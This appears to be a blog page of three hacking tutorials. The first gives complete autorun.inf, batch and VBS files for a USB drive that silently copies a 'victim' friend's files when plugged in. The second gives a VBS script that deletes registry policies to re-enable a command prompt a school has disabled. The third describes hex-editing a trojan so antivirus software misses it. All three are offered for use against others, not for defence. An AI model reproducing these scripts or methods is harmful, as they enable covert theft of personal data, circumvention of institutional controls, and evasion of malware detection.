Steel Someone Secret File Using USB Flash Drive.

 

 
Hi Friends,

Today i am posting a way to steel secret file from your friends computer.

Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.

To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.

Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.
STEP 1

Open Notepad (I recommend Notepad++) and copy-paste the following lines.
(Code-
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat)

Save this as autorun.inf

The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.

The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.
STEP 2

Open Notepad again and copy-paste the following lines
(code-
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls)

Save this as file.bat

This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.

The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.
STEP 3

Open Notepad once again and copy-paste the following line.
(code:
CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False)

Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
STEP 4

Open Notepad one last time and copy-paste the following line.
(code
wscript.exe \invisible.vbs file.bat)

Save this as launch.bat

This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.
STEP 5

Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.

This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

 
 

 Soumik

Advertisements

Restore CMD at College

 

 
I am not responsible for what you do with this, what you do are your actions, not mine!

So your school disabled command prompt?

Well read this short and sweet tut and find out how to get it back!

First open notepad and paste this in:
Code:

Set WshShell = WScript.CreateObject(“WScript.Shell”)
With WScript.CreateObject(“WScript.Shell”)

On Error Resume Next

.RegDelete “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”
.RegDelete “HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD”

End With

Mybox = MsgBox(jobfunc & enab & vbCR & “Congrats, you have re-enabled your Command Prompt!”, 4096, t)

And click save as, 
Code:
cmdrestore.vbs
and click Save As: All Files, and just save it to the desktop or anywhere you want.

Then, go to where you save it and double click, if it says: “Congrats, you have re-enabled your Command Prompt” then it worked succesfully.

What it basically does is delete the DisableCMDPrompt registry, which then enables you to use command prompt…so enjoy!

Soumik

 
 

 

[Tut] Make virus undetectable by HEXeditor[Tut]

 

 
Many people asking how to hexedit, I decided to write
this little tutorial. I will try to explain how to hexedit your favourite Trojan in order to
make it undetected by certain antivirus programs. I will try to put this as simple as
possible so everyone understands it.
Content:
1. General info about hexediting .
2. What tools you need to get started.
3. How to hex.
-step 1
-step 2
-step 3
__ __
1. General info about hexediting?
If you want to make your server undetectable, you need to know how AVs work and
how they detect your files, right? There are a few ways that AVs use to detect your
server heuristics, sandboxing, etc., and one of them is using so called “definition files”
that carry information about strings inside your server. Well, that’s the way we are
going again in this tutorial because hexing is pretty much useless for other methods of
detection. So when AVs scan your files it searches for specific stings on specific parts
in your server, and if strings match with strings in the AV database, your file is
detected.
Let as say that detected strings are “XX” so we need to change that string to something
else (e.g. “XY”,”YY”) that isn’t in the AV definition database so the file can not be
matched with any of the AV definitions and that way the file will be undetectable.
There are going to be a few tagged strings in your server – not only one, depending on
what trojan you are using and how popular is. Less popular trojans tend to have less
tagged parts, and with that they are easier to make it undetectable.
First of all, hexing is not the best method for undetecting files because AVs can
change old tagged parts, and once your AV is updated, new definition files are
downloaded and your once undetected server might become detected again. Also not
all AVs use the same tagged parts – this way you need to hex your server against more
AVs to make it fully undetected. This can be annoying because you need to download
wanted AVs then hex it your server, then download another etc., etc. Sometimes AVs
tag critical parts of the server, and if that part is altered will corrupt the server. Also,
heavily edited servers can become unstable, some functions might not work, or even
you can corrupt your server and make it useless.
Thats why you need to check your server if its still working after every single
change you made while hexing it.
Now how to find detected strings in your server?
There are few ways you can do this: Manually cut your server in half adding parts to
one half and scanning it until you find the detected string (which is slow and time
consuming); use file splitters to split your server into
bytes, and after that scan all split files and find out what byte is detected then alter it
in original exe, or you can use an offset AV .
2. What tools we need.
– Unpacked trojan server. (That’s your virus)

– Hex editor > DOWNLOAD
– File Splitter > DOWNLOAD 

– AV-antivirus

3. How to hex:

Now to make more simple i add these video TuT how can u make virus undetectable by AV , Watch it > 

watch it here

 
 :::Soumik Ghosh:::